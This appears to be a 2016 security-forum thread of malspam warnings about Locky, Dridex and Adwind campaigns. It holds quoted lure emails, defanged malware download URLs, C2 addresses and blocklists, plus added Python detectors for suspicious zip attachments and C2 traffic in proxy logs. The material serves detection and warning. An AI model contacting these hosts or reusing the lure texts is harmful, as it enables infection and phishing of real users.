1] https://malwr.com/analysis/YzBlYzNkMWU1MDU3NDEzMzhhYzJiYjZmYTI0ZWJlYmM/
Hosts
96.0.130.2
217.12.199.244


2] https://malwr.com/analysis/OWMwZTM2N2I5MzRlNDZjOGIyNTZmMTNmNmU4ZWRjZmY/
Hosts
208.71.139.66
217.12.199.244


3] https://malwr.com/analysis/NDJlYjI0Yjc4MTRjNGIxYjgzNGI5ZWVjOGJlMWJkMzE/

4] https://www.virustotal.com/en/file/...314bb84028659e1e6e76deb0/analysis/1475484796/

5] https://www.virustotal.com/en/file/...29ba5327b8e003d54c1f0120/analysis/1475484485/

6] https://www.virustotal.com/en/file/...d0b56176617e0622afb76724/analysis/1475484779/

* https://www.virustotal.com/en/file/...abe1b282f26314c769c1f68e/analysis/1475479730/

** https://www.virustotal.com/en/file/...abe1b282f26314c769c1f68e/analysis/1475479730/

*** https://www.hybrid-analysis.com/sam...10ad0b56176617e0622afb76724?environmentId=100
Contacted Hosts
111.221.40.34
54.218.66.17
52.85.184.121


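Added example, not from the original post or the quoted blogs: the 'Clients accounts 32C58E xls.wsf' attachment in the first post and the 'paperwork scan ~1EB91.wsf' one above show the tricks these write-ups keep describing, a script file inside a zip, a decoy document extension sitting in front of the real one (invisible when Windows hides known extensions, as the 'New Order' post notes), and the junk single-letter file packed alongside. The Python below unpacks a zip in memory and flags members on those three signals. The archive contents are constructed to mimic those names; the SCRIPT_EXTENSIONS and DECOY_EXTENSIONS lists are my own assumption. RAR attachments (the 'Bill' campaign) need a separate extractor, and macro-bearing .xls/.doc attachments are not caught by this check at all.

```python
from __future__ import annotations
import io
import re
import zipfile

# Assumption: extensions Windows hands to WScript/mshta/Java/the loader when double-clicked.
SCRIPT_EXTENSIONS = {"wsf", "hta", "js", "jse", "vbs", "vbe", "jar", "exe", "scr", "cmd", "bat", "ps1"}
# Assumption: document/image extensions used as decoys in front of the real one.
DECOY_EXTENSIONS = {"xls", "xlsx", "doc", "docx", "pdf", "jpg", "jpeg", "png", "txt"}


def classify_member(name: str) -> list[str]:
    """Reasons an archive member looks like a malspam dropper; an empty list means nothing found."""
    base = name.rsplit("/", 1)[-1]
    stem, dot, ext = base.rpartition(".")
    if not dot:                    # no dot at all: the whole name is the stem
        stem, ext = base, ""
    ext = ext.lower()
    reasons = []
    if ext in SCRIPT_EXTENSIONS:
        reasons.append(f"script/executable payload (.{ext})")
        # "Clients accounts 32C58E xls.wsf": a decoy document extension sits before the real one.
        tokens = re.split(r"[ ._~-]+", stem.lower())
        if any(t in DECOY_EXTENSIONS for t in tokens):
            reasons.append("decoy document extension before the real extension")
    if not ext and len(stem) == 1:
        reasons.append("one-letter junk file, the padding seen next to .wsf droppers")
    return reasons


def triage_archive(data: bytes) -> dict[str, list[str]]:
    """Map suspicious member names to their reasons. Raises zipfile.BadZipFile for non-zip input."""
    findings: dict[str, list[str]] = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            reasons = classify_member(info.filename)
            if reasons:
                findings[info.filename] = reasons
    return findings


def should_quarantine(data: bytes) -> bool:
    return bool(triage_archive(data))


def build_zip(members: dict[str, bytes]) -> bytes:
    """Build an in-memory zip; used here only to construct the samples below."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in members.items():
            zf.writestr(name, content)
    return buf.getvalue()


# Constructed samples: the names mimic attachments quoted in this thread, the contents are placeholders.
MALICIOUS_SAMPLE = build_zip({
    "Clients accounts 32C58E xls.wsf": b"<job><script language='JScript'>/* obfuscated downloader */</script></job>",
    "q": b"padding",
})
BENIGN_SAMPLE = build_zip({"Receipt 103-526.pdf": b"%PDF-1.4 placeholder"})

if __name__ == "__main__":
    for label, blob in (("malicious", MALICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        verdict = "QUARANTINE" if should_quarantine(blob) else "pass"
        print(label, "->", verdict, triage_archive(blob))
```

This is a gateway-side check on the archive listing only; nothing is executed or decoded. It will not see the Receipt.xls and Receipt 45019-0740.doc macro droppers described in the later posts, which arrive unzipped and need a macro scan rather than an extension check.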
Fake 'Refund', 'Bill for parcel', 'Voicemail', 'Travel Itinerary' SPAM

FYI...

Fake 'Refund' SPAM - delivers Locky
- https://myonlinesecurity.co.uk/refu...l-or-postal-companies-malspam-delivers-locky/
4 Oct 2016 - "... Locky downloaders.. an email with the subject of 'Refund' pretending to come from various randomly chosen delivery, parcel or postal companies with a semi random named zip attachment starting with refund containing a WSF file... a very small portion of the several hundred received in the last few minutes, so -Any- delivery company is likely to be spoofed.
Royal Mail
PostNL
Schenker AG
Japan Post Group
FedEx
DHL
DHL Express


One of the emails looks like:
From: Royal Mail <Reynolds.21@ usacabs .com>
Date: Thu 01/09/2016 19:22
Subject: Refund
Attachment: refund_scan_a2e0a7b.zip
Dear [redacted], please submit the return form to receive the refund.
The parcel must have its original packaging. The return form is attached in this mail.
Best regards,
Elsa Reynolds
Royal Mail


4 October 2016: refund_scan_a2e0a7b.zip: Extracts to: refund scan 392CDC4.wsf
Current Virus total detections 8/54*. Payload Security** shows a download of an encrypted file from
motos13 .com/w0bmffo which is transformed by the script to a working Locky file. Unfortunately Payload Security does not show or allow download of the file in the free web version. This looks like the version with no C2 ... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/...f9ce014827ca2817a80d04a5/analysis/1475567273/

** https://www.hybrid-analysis.com/sam...287f9ce014827ca2817a80d04a5?environmentId=100
Contacted Hosts
81.93.240.134
52.85.184.21
52.41.235.21

___

Fake 'Bill for parcel' SPAM - delivers Locky – Odin
- https://myonlinesecurity.co.uk/bill-for-parcel-064983-04-10-2016-malspam-delivers-locky-odin/
4 Oct 2016 - "... Locky downloaders.. a -blank- email with the subject of 'Bill for parcel' 064983-04-10-2016 pretending to come from no-reply @ random email addresses with a random named zip attachment containing a WSF file. This version of Locky with an Odin-extension is using DLL files, whereas last night’s version* used .exe files.
* https://myonlinesecurity.co.uk/sure...oicemailandfax-random-domains-delivers-locky/
The subject line will always start with 'Bill for', then it will be either 'Parcel, Document, Documents, Papers' or other similar words, then a random number, then today’s date... One of the emails looks like:
From: no-reply@ speroresources .com
Date: Tue 04/10/2016 08:04
Subject: Bill for parcel 064983-04-10-2016
Attachment: Bill 772-04-10-2016.zip


Body content: totally blank/empty

4 October 2016: Bill 772-04-10-2016.zip: Extracts to: Bill 3609756-04-10-2016.wsf
Current Virus total detections 6/54*. MALWR** shows a download of an encrypted file from
http ://aluvista .com/erg7cbr?QJWtIXrQ=oUDSEKIWsF which is transformed by the script to WkOUeAz1.dll
(VirusTotal 7/56***). C2 is http ://158.255.6.115 /apache_handler.php - other C2 locations are shown in the Payload Security report[4]... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/...498d17d7678128e00800ce58/analysis/1475561395/

** https://malwr.com/analysis/ZTRlYTJiZGNiODRkNDQyMWJkMjRlZWIzNmQyM2ViMzk/
Hosts
78.46.34.83
158.255.6.115


*** https://www.virustotal.com/en/file/...65c445a650589ae01db6fa9d/analysis/1475567524/

4] https://www.hybrid-analysis.com/sam...6db498d17d7678128e00800ce58?environmentId=100
Contacted Hosts
78.46.34.83
158.255.6.115
81.177.26.201
52.85.184.9

___

Fake 'Voicemail' SPAM - delivers Locky
- https://myonlinesecurity.co.uk/sure...oicemailandfax-random-domains-delivers-locky/
3 Oct 2016 - "... Locky downloaders.. an email with the subject of 'Voicemail' from [random name] [random number] <[random number]> [random time] pretending to come from voicemailandfax@ random email addresses with a semi-random named zip attachment containing a HTA file... One of the emails looks like:
From: SureVoIP <voicemailandfax@ nexgtech .com>
Date: Mon 03/10/2016 22:22
Subject: Voicemail from Sherri metcalf 00780261644 <00780261644> 00:01:40
Attachment: msg_dbf6-d46d-0134-fb2b-92a8c040c64d.zip
Message From “Sherri metcalf 00780261644” 00780261644
Created: 2016.10.03 16:23:42
Duration: 00:01:40 ...


3 October 2016: msg_dbf6-d46d-0134-fb2b-92a8c040c64d.zip: Extracts to: 0332451600272.hta
Current Virus total detections 7/54*. Payload Security** shows a download of an encrypted file from
acaciainvest .ro/98h86f?HmaeXAiu=CQDbSkNs which is transformed by the script to xsyMCaVC1.exe
(VirusTotal 5/56***)... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/...ec4461ecfdaf4954bf3a9d9d/analysis/1475531086/

** https://www.hybrid-analysis.com/sam...f71ec4461ecfdaf4954bf3a9d9d?environmentId=100
Contacted Hosts
188.240.2.32
149.202.52.215
81.177.26.201
52.85.184.21


*** https://www.virustotal.com/en/file/...3a0a890a4fb96e7297ef370f/analysis/1475531106/
___

Fake 'Travel Itinerary' SPAM - delivers Locky
- https://myonlinesecurity.co.uk/travel-itinerary-from-random-airlines-delivers-locky/
3 Oct 2016 - "... Locky downloaders.. an email with the subject of 'Travel Itinerary' pretending to come from random airline companies with a semi-random named zip attachment starting with 'Travel_Itinerary' containing a WSF file... I have seen these pretend to come from just about every airline in existence. Some received include:
Asiana Airlines <Flynn.92@ dsldevice .lan>
Swiss Air Lines <Hamilton.560@ dsldevice .lan>
Lufthansa <Cardenas.4568@ sewerlinereplacementrichmond .com>
Thai Airways <Mercer.030@ airtelbroadband .in>
Singapore Airlines <Burt.5051@ nbftv .no>
Cathay Pacific <Pacheco.074@ telecomitalia .it>
Turkish Airlines <Barker.585 @sabanet .ir>
Emirates <Flores.935@ deborahkellymft .com>
Virgin Australia <Terry.46@ philipskillman .com>
Qantas Airways <Weiss.213@ ceas .com.ve>


One of the emails looks like:
From: Asiana Airlines <Flynn.92@ dsldevice .lan>
Date: Mon 03/10/2016 19:09
Subject: Travel Itinerary
Attachment: Travel_Itinerary-a884558.zip
Dear [redacted]
Thank you for flying with us! We attached the Travel Itinerary for Your booking number #3FD6F18.
See the paid amount and flight information.
Best regards,
Stephan Flynn
Asiana Airlines


3 October 2016: Travel_Itinerary-a884558.zip: Extracts to: Travel_Itinerary-4F2AD50.wsf
Current Virus total detections 5/54*. MALWR is unable to fully analyse these and get any download links or payload. Payload Security** shows a download of an encrypted file from
onlinesigortam .net/njahqfis which is transformed by the script to a working Locky file...
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/...59446543282d29d866b228d5/analysis/1475518144/

** https://www.hybrid-analysis.com/sam...d0559446543282d29d866b228d5?environmentId=100
Contacted Hosts
159.253.36.221
185.135.80.235
91.219.31.49
178.63.238.182
69.195.129.70
50.112.202.19
52.85.184.9


:fear::fear: :mad:
 
Fake 'Document', 'complaint letter', 'Cancellation request' SPAM

FYI...

Fake 'Document' SPAM - leads to Locky
- http://blog.dynamoo.com/2016/10/malware-spam-document-from-leads-to.html
5 Oct 2016 - "I have only received a single sample of this spam, presumably it comes from random senders. There is no body text in my sample.
Subject: Document from Paige
From: Paige cuddie (Paige592035@ gmail .com)
Date: Wednesday, 5 October 2016, 9:37


In this case there was an attached file DOC-20161005-WA0002793.zip containing a malicious script... DOC-20161005-WA0002715.wsf. Automated analysis [1] [2] shows this sample downloads from:
euple .com/65rfgb?EfTazSrkG=eLKWKtL
There will be many other locations besides this. Those same reports show the malware (in this case Locky ransomware) phoning home to:
88.214.236.36 /apache_handler.php (Overoptic Systems, UK / Russia)
109.248.59.100 /apache_handler.php (Ildar Gilmutdinov aka argotel.ru, Russia)
The sample I found downloaded a legitimate binary from ciscobinary.openh264 .org/openh264-win32-v1.3.zip presumably as an anti-analysis technique.
Recommended blocklist:
88.214.236.0/23
109.248.59.0/24
"
1] https://malwr.com/analysis/MDdlZDI1NTkxZDllNDFkY2I5NDNhYmZkYjY3YzEyMWU/
Hosts
23.88.37.83
88.214.236.36


2] https://www.hybrid-analysis.com/sam...c6f9020a96d9eeaad9786382bb1?environmentId=100
Contacted Hosts
23.88.37.83
88.214.236.36
109.248.59.100
52.32.150.180
52.85.184.129
52.41.235.21

___

Fake 'complaint letter' SPAM - delivers Locky
- https://myonlinesecurity.co.uk/complaint-letter-malspam-delivers-locky/
5 Oct 2016 - "... Locky downloaders.. an email with the subject of 'complaint letter' coming as usual from random companies, names and email addresses with a semi-random named zip attachment starting with complaint_letter_ containing a WSF file... note the misspelled/typo error in the email body, 'King regards'. We have seen that quite frequently... One of the emails looks like:
From: Roxie Davis <Davis.863@ adsl.viettel .vn>
Date: Wed 05/10/2016 10:20
Subject: complaint letter
Attachment: complaint_letter_cb9d039ea.zip
Dear [redacted], client sent a complaint letter regarding the data file you provided.
The letter is attached. Please review his concerns carefully and reply him as soon as possible.
King regards,
Roxie Davis


5 October 2016: complaint_letter_cb9d039ea.zip: complaint letter 4A683AD.wsf
Current Virus total detections 8/53*... Payload Security** shows a download of an encrypted file from
upper-classmen .com/k1hd6 which is transformed by the script to RpKwxNZ92.dll (VirusTotal 8/56***)... The basic rule is NEVER open any attachment to an email, unless you are expecting it...."
* https://www.virustotal.com/en/file/...a0897f99ba421e80e2fa4cad/analysis/1475660416/

** https://www.hybrid-analysis.com/sam...c35a0897f99ba421e80e2fa4cad?environmentId=100
Contacted Hosts
192.138.189.69
109.248.59.100
88.214.236.36
217.12.223.78
109.248.59.164
91.219.31.49


*** https://www.virustotal.com/en/file/...805fa1a727d49115e98e8efc/analysis/1475661773/
___

Fake 'Cancellation request' SPAM - delivers Locky
- https://myonlinesecurity.co.uk/cancellation-request-malspam-delivers-locky/
5 Oct 2016 - "... Locky downloaders.. an email with the subject of 'Cancellation request' coming as usual from random companies, names and email addresses with a semi-random named zip attachment starting with Cancellation_Form_ containing a .JS file... One of the emails looks like:
From: Katharine Clayton <Clayton.892@ myfghinc .com>
Date: Wed 05/10/2016 19:40
Subject: Cancellation request
Attachment: Cancellation_Form_3805419.zip
Dear [redacted], to cancel the request you made on October 4th, you need to fill out the cancellation form attached in this email.
Contact us if you need further assistance.
Best regards,
Katharine Clayton
Clients Support


5 October 2016: Cancellation_Form_3805419.zip: Extracts to: Cancellation Form 4FDE6.js
Current Virus total detections 9/54*. MALWR** shows a download of an encrypted file from
http ://noisecontrols .com/dctpl4c which is transformed by the script to CSWzQT0oHGGp27m.dll
(VirusTotal 11/56***)... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/...e63a5d3bffe22bb4916105b7/analysis/1475693156/

** https://malwr.com/analysis/MGQwNDU3ZjU3YjYxNDNjYmFiNzkyY2FkODY5MWI3MjQ/
Hosts
101.100.175.250

*** https://www.virustotal.com/en/file/...4d3e20ef0616909f4ac8bbcc/analysis/1475694004/

:fear::fear: :mad:
 
Fake 'Your Order', 'Invoice' SPAM

FYI...

Fake 'Your Order' SPAM - delivers Locky
- https://myonlinesecurity.co.uk/your-order-malspam-delivers-locky/
6 Oct 2016 - "... Locky downloader.. an email with the subject of 'Your Order' coming as usual from random companies, names and email addresses with a semi-random named zip attachment starting order_details_ containing a .JS file... One of the emails looks like:
From: Hilario Walton <Walton.571@ afirstclassmove .com>
Date: Thu 01/09/2016 19:22
Subject: Travel expense sheet
Attachment: order_details_bfa256b5.zip
Your order has been proceeded. Attached is the invoice for your order A-1376657.
Kindly keep the slip in case you would like to return or state your product’s warranty.


6 October 2016: order_details_bfa256b5.zip: Extracts to: Cancellation Form 0D582E2.js
Current Virus total detections 7/54*. MALWR** shows a download of an encrypted file from
http ://pioneerschina .com/xwks4 which is transformed by the script to Prxa55gCpc.dll (VirusTotal 12/56***)
C2 http ://217.12.223.78 /apache_handler.php... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/...408b86c7868bd9d44d470f41/analysis/1475741537/

** https://malwr.com/analysis/N2JhMWQ4...zdkOWI/share/42698fd693c448d5bb86ec016cdab8ad
Hosts
69.195.71.128
217.12.223.78


*** https://www.virustotal.com/en/file/...62b2b5f418cef59809f6f404/analysis/1475742167/

- http://blog.dynamoo.com/2016/10/malware-spam-your-order-and-inevitable.html
6 Oct 2016 - "This -fake- financial spam leads to Locky ransomware:
From: Adrian Salinas
Date: 6 October 2016 at 10:13
Subject: Your Order
Your order has been proceeded. Attached is the invoice for your order A-6166964.
Kindly keep the slip in case you would like to return or state your product's warranty.


Details will change from email to email. Attached is a ZIP file with a name similar to order_details_cb9782b.zip containing a malicious obfuscated javascript file named similarly to Cancellation Form 6328B32E.js
According to my source, these various scripts then download a component...
(Many domain-names listed at the dynamoo URL above.)
The malware then phones home to the following IPs (belonging pretty much to the usual suspects):
46.8.44.105 /apache_handler.php (Netart Group / Zomro, Ukraine)
91.219.28.76 /apache_handler.php (FLP Kochenov Aleksej Vladislavovich aka uadomen.com, Ukraine)
188.120.236.21 /apache_handler.php (TheFirst-RU, Russia)
217.12.223.78 /apache_handler.php (ITL, Ukraine)
46.183.221.134 /apache_handler.php (Dataclub, Latvia) ...
Recommended blocklist:
46.8.44.105
46.183.221.128/25
91.219.28.76
188.120.236.21
217.12.223.78
"
___

Fake 'Invoice' SPAM - .doc attachment leads to Locky
- http://blog.dynamoo.com/2016/10/malware-spam-invoice-123456-12345678.html
6 Oct 2016 - "This -fake- financial spam leads to malware:
From: invoices@ [redacted] .com
Date: 6 October 2016 at 07:16
Subject: Invoice-365961-42888419-888-DE0628DA
Dear Customer,
Please find attached Invoice 42888419 for your attention.
Should you have any Invoice related queries please do not hesitate to contact either your designated Credit Controller or the Main Credit Dept. on 01635 279370.
For Pricing or other general enquiries please contact your local Sales Team.
Yours Faithfully,
Credit Dept'
### This mail has been sent from an un-monitored mailbox ###


The name of the sender and reference numbers will change from email to email. Attached is a Word document with a name in a format similar to 20161006_42888419_Invoice.doc... The sample I sent for automated analysis [1] [2] downloads some data from:
eaglemouth .org/d5436gh
... my sources (thank you, you know who you are) that there are additional download locations at:
dabihfluky .com/d5436gh
fauseandre .net/d5436gh
This particular variant of Locky ransomware uses black hat hosting for this download location rather than a -hacked- legitimate site. All these domains are hosted on the following IPs:
62.84.69.75 (FiberLink Networks, Lebanon)
85.118.45.12 (Andrexen, France) ...
(Many domain-names listed at the dynamoo URL above.) ...
A DLL is dropped with a detection rate of 13/56*.
UPDATE: I completely forgot to include the C2. D'oh.
109.248.59.164 /apache_handler.php (Netart, Russia)
Recommended blocklist:
62.84.69.75
85.118.45.12
109.248.59.164
"
1] https://malwr.com/analysis/ODUxOTJmODJiOGFiNDQyMmE1YTEyMDcwN2E5ODBmMjU/
Hosts
85.118.45.12

2] https://www.hybrid-analysis.com/sam...8017f756508c752f41e7456db35?environmentId=100
Contacted Hosts
62.84.69.75
109.248.59.164
52.32.150.180
54.192.203.206


* https://virustotal.com/en/file/9a44...ac3bfa92f0a46066ce680d76/analysis/1475744035/

:fear::fear: :mad:
 
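The dynamoo posts above end with "Recommended blocklist" entries (a mix of bare IPs and CIDRs) and note that Locky phones home by POSTing to /apache_handler.php on a bare-IP host, with the warning that other addresses exist besides the ones listed. The following is an added example, not code from the forum posts or the quoted blog: it parses blocklist text copied from the posts above, then runs constructed squid-style proxy log lines (the log format and the RFC 5737 documentation addresses standing in for hosts the posts do not name are assumptions of this example) past both the blocklist and the C2-path pattern, so that a POST to /apache_handler.php on an address not yet on the list is still flagged.

```python
"""Blocklist and C2-path check over proxy logs for the Locky campaigns above.

Added example, not code from the forum posts or the quoted dynamoo blog.
The blocklist entries are copied from the dynamoo posts in this thread;
the log lines are constructed (RFC 5737 documentation addresses stand in
for hosts the posts do not name).
"""
import ipaddress
import re
from urllib.parse import urlsplit

# Recommended blocklists quoted in the posts above: bare IPs and CIDRs mixed.
BLOCKLIST_TEXT = """
88.214.236.0/23
109.248.59.0/24
46.8.44.105
46.183.221.128/25
91.219.28.76
188.120.236.21
217.12.223.78
62.84.69.75
85.118.45.12
"""

# C2 path the posts report Locky phoning home to.
C2_PATHS = {"/apache_handler.php"}

# Constructed squid-style lines: timestamp client method url dest-ip status
SAMPLE_LOG = [
    "2016-10-06T10:15:01Z 10.1.2.33 POST http://88.214.236.36/apache_handler.php 88.214.236.36 200",
    "2016-10-06T10:15:09Z 10.1.2.33 GET http://euple.com/65rfgb?EfTazSrkG=eLKWKtL 203.0.113.7 200",
    "2016-10-06T10:16:00Z 10.1.2.34 POST http://198.51.100.9/apache_handler.php 198.51.100.9 200",
    "2016-10-06T10:17:00Z 10.1.2.35 GET http://www.example.com/index.html 93.184.216.34 200",
    "2016-10-06T10:18:00Z 10.1.2.36 GET http://46.183.221.200/ 46.183.221.200 404",
    "garbage line that does not parse",
]

LOG_LINE = re.compile(
    r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<dst>\S+) (?P<status>\d+)$"
)


def parse_blocklist(text):
    """Turn IP/CIDR lines into ip_network objects; a bare IP becomes a /32."""
    nets = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if line:
            nets.append(ipaddress.ip_network(line, strict=False))
    return nets


def in_blocklist(ip, nets):
    """True if ip falls inside any listed network."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in nets)


def is_ip_literal(host):
    """True when the URL host is a bare IP rather than a hostname."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def check_log(lines, nets):
    """Return (client, dst, path, reasons) for every line worth alerting on."""
    alerts = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # unparseable line; a real pipeline would count these
        parts = urlsplit(m["url"])
        reasons = []
        if in_blocklist(m["dst"], nets):
            reasons.append("destination on blocklist")
        # Locky posts to a bare-IP host; the post warns other IPs exist, so
        # the path pattern is checked independently of the blocklist.
        if (m["method"] == "POST" and parts.path in C2_PATHS
                and is_ip_literal(parts.hostname or "")):
            reasons.append("POST to known Locky C2 path")
        if reasons:
            alerts.append((m["client"], m["dst"], parts.path, reasons))
    return alerts


if __name__ == "__main__":
    nets = parse_blocklist(BLOCKLIST_TEXT)
    for client, dst, path, reasons in check_log(SAMPLE_LOG, nets):
        print(f"{client} -> {dst}{path}: {'; '.join(reasons)}")
```

The second sample line (the euple .com download URL from the post) produces no alert on purpose: the download hosts are mostly hacked legitimate sites that change daily, so only the C2 pattern and the blocklisted ranges are worth alerting on; the download URLs are better treated as short-lived indicators.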
Fake 'wrong paychecks' SPAM

FYI...

Fake 'wrong paychecks' SPAM - delivers Locky/Odin
- https://myonlinesecurity.co.uk/wrong-paychecks-malspam-delivers-locky-odin/
7 Oct 2016 - "... Locky downloader.. an email with the subject of 'wrong paychecks' coming as usual from random companies, names and email addresses with a semi-random named zip attachment starting with paychecks_ containing a .JS file... One of the emails looks like:
From: Guy Bennett <Bennett.75@ janicerich .com>
Date: Thu 06/10/2016 22:17
Subject: wrong paychecks
Attachment: paychecks_43b3b18.zip
Hey [redacted]. They send us the wrong paychecks. Attached is your paycheck arrived to my email by mistake.
Please send mine back too.
Best regards,
Guy Bennett


7 October 2016: paychecks_43b3b18.zip: Extracts to: paychecks exported 5648A20E.js
Current Virus total detections 11/54*. MALWR** shows a download of an encrypted file from
http ://bdfxb .com/jp0zuso which is transformed by the script to YXljL8XPAjn.dll (VirusTotal 10/56***). Payload Security[4] shows multiple C2 and additional download locations... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/...c04cb71ec791b782751d43bb/analysis/1475801339/

** https://malwr.com/analysis/OTNiMTUxMTE2MDk0NDg1MGE4MGE4Nzg0OTJjN2NhMjU/
Hosts
182.92.220.92

*** https://www.virustotal.com/en/file/...ea35245f6719cce82b23966d/analysis/1475820102/

4] https://www.hybrid-analysis.com/sam...d03c04cb71ec791b782751d43bb?environmentId=100
Contacted Hosts
31.210.120.156
185.82.217.98
185.75.46.122
185.154.13.182
95.213.179.232
69.195.129.70


:fear::fear: :mad:
 
Dridex - random subjects with cab files - SPAM

FYI...

Dridex - random subjects with cab files - SPAM
- https://myonlinesecurity.co.uk/dridex-delivered-via-random-subjects-with-cab-files/
11 Oct 2016 - "... an email with a variety of subjects along the lines of 'Form Sydnee I. Hahn' (initial word is either Form/Token/License/Certificate or other similar word, followed by a name that matches the name in the body of the email), coming as usual from random companies, names and email addresses with a semi-random named cab file attachment (that matches the subject word) containing a .JS file (cab files are Microsoft specific archives (zip files) that are normally used for windows updates. Almost any unzipping tool will extract them, however windows explorer will natively extract and -autorun- any content inside a cab file if double clicked to open them). This looks like Dridex today, rather than the Locky ransomware...
Update 09.30 UTC: A second run starting with a mix of .cab files and .zip files, possibly because many mail filtering systems including Mail Scanner used on a high proportion of Linux mail servers detects and warns about .cab files by default. Some servers are set to block them automatically. This server is set to warn about potentially dangerous file extensions but not block them (to certain domains only) so I can obtain malware samples to warn/alert and submit to anti-virus companies and help protect everybody. For every cab file that I have received so far, I also got a warning message to my postmaster/admin email address. The sort of subjects we are seeing include:
Form Sydnee I. Hahn
Token Jolie T. Barrett
License Armando H. Bates
Certificate Brittany T. Beach
Archive Linda K. McLaughlin
Papers Sylvia C. Price
Agreement Dieter U. Vinson
Report David W. Rogers
Document Isaac Q. Lucas


One of the emails looks like:
From: HilariSydnee I. Hahn <rtep.springvale@ ljh .com.au>
Date: Tue 11/10/2016 08:03
Subject: Form Sydnee I. Hahn
Attachment: Form.cab
Good morning
Please review your Form.
I’m waiting for your reply
Kindest regards
Sydnee I. Hahn


An alternative body content:
Hi
Here is your Token.
Pls inform me the answer as soon as posible
Regards
Jolie T. Barrett


An alternative body content:
Greetings
Here is your License.
I’m still waiting for your answer
Cain M. Rogers


11 October 2016: Form.cab: Extracts to: 20792.tmp - Current Virus total detections 0/55*
.. MALWR** shows a download from http ://www .mobilemanager .fr/log.khp which gave me 20792.tmp (VirusTotal 6/56***)
Detections are inconclusive but Payload Security[4] indicates that this is most probably Dridex banking Trojan. However, that also shows an error in running the file with an unsupported system message. That might mean that there is a fault with the Dridex binary or, more likely, that the Dridex malware gang have added even more protections to their malware, stopping it running when a sandbox or VM is detected... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/...db45019e901131826d214e0e/analysis/1476169831/

** https://malwr.com/analysis/YTFmNTQ5MmZhMGI5NDNkNTliNzYwNjdlOTYxZDc3YmE/
Hosts
217.76.132.43

*** https://www.virustotal.com/en/file/...4f152b43b25fd4e8f7f3389c/analysis/1476170061/

4] https://www.hybrid-analysis.com/sam...58adb45019e901131826d214e0e?environmentId=100
Contacted Hosts
217.76.132.43
195.154.163.166
88.213.204.147


:fear::fear: :mad:
 
Fake 'Payment - wire transfer' SPAM

FYI...

Fake 'Payment - wire transfer' SPAM - delivers Java Adwind
- https://myonlinesecurity.co.uk/did-...-to-our-account-malspam-delivers-java-adwind/
12 Oct 2016 - "... daily.. -fake- financial themed emails containing java adwind attachments...
This article[1] from a couple of years ago explains why you should remove it.
If you cannot remove it then it -must- be kept up-to-date[2] .. be extremely careful with what you download or open...
1] https://www.theguardian.com/technology/askjack/2013/feb/08/java-remove-ask-jack-technology
2] https://java.com/en/download/
... The email looks like:
From: Account <order@ coreadmin .eficaz .cl>
Date: Wed 12/10/2016 04:56
Subject: RE: Payment
Attachment: Details.zip
Hi,
Did you authorize any wire transfer to our account?
We have received an amount of USD79,948.12 from your account and we do not know what this fund is for.
We do not have any transaction with your company that we know about. So why making payment to us.
Please see the attached remittance documents and double-check with your bank.
We wait for your comment.
Best Regards,
Leo Lee,
Navkar Corporation Ltd
215 Lumpoo Road, Wadsampraya, Pranakorn
Bangkok, 10200 Thialand ...


12 October 2016: details.jar (119kb) - Current Virus total detections 5/55*. Payload Security**
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/...cf28f511c33086d008a419f7/analysis/1476250143/

** https://www.hybrid-analysis.com/sam...776cf28f511c33086d008a419f7?environmentId=100

:fear::fear: :mad:
 
WSF email attachments ...

FYI...

WSF email attachments - latest malware delivery vehicle
- https://www.helpnetsecurity.com/2016/10/13/wsf-attachments-malware-delivery/
Oct 13, 2016 - "Most users have by now learned not to open executable (.EXE), various MS Office, RTF and PDF files delivered via -unsolicited- emails, but malware peddlers are always trying out new ways to trick users, email filters and AV software... According to Symantec*, Windows Script Files (WSFs) are the latest file types to be exploited to deliver malware via email...
> https://www.helpnetsecurity.com/images/posts/WSF_attachments.jpg
Number of blocked emails containing malicious WSF attachments by month "

Surge of email attacks using malicious WSF attachments
* https://www.symantec.com/connect/fr/blogs/surge-email-attacks-using-malicious-wsf-attachments
12 Oct. 2016 - "Symantec has seen a major increase in the number of email-based attacks using malicious Windows Script File (WSF) attachments over the past three months. Ransomware groups in particular have been employing this new tactic. In the past two weeks, Symantec has blocked a number of major campaigns distributing Locky (Ransom.Locky) which involved malicious WSF files...
Malicious WSF files have been used in a number of recent major spam campaigns spreading Locky. For example, between October 3 and 4, Symantec blocked more than 1.3 million emails bearing the subject line "Travel Itinerary." The emails purported to come from a major airline and came with an attachment that consisted of a WSF file within a .zip archive. If the WSF file was allowed to run, Locky was installed on the victim's computer...
> Tips on protecting yourself from ransomware
Regularly back up any files stored on your computer. If your computer does become infected with ransomware, your files can be restored once the malware has been removed.
Always keep your security software up to date to protect yourself against any new variants of malware.
Keep your operating system and other software updated. Software updates will frequently include patches for newly discovered security vulnerabilities that could be exploited by attackers.
Delete any suspicious-looking emails you receive, especially if they contain links or attachments.
Be extremely wary of any Microsoft Office email attachment that advises you to enable macros to view its content. Unless you are absolutely sure that this is a genuine email from a trusted source, do not enable macros and instead immediately delete the email."

:fear::fear: :mad:
 
Fake 'Final payment' SPAM

FYI...

Fake 'Final payment' SPAM - delivers malware
- https://myonlinesecurity.co.uk/final-payment-request-pretending-to-come-from-hmrc-delivers-malware/
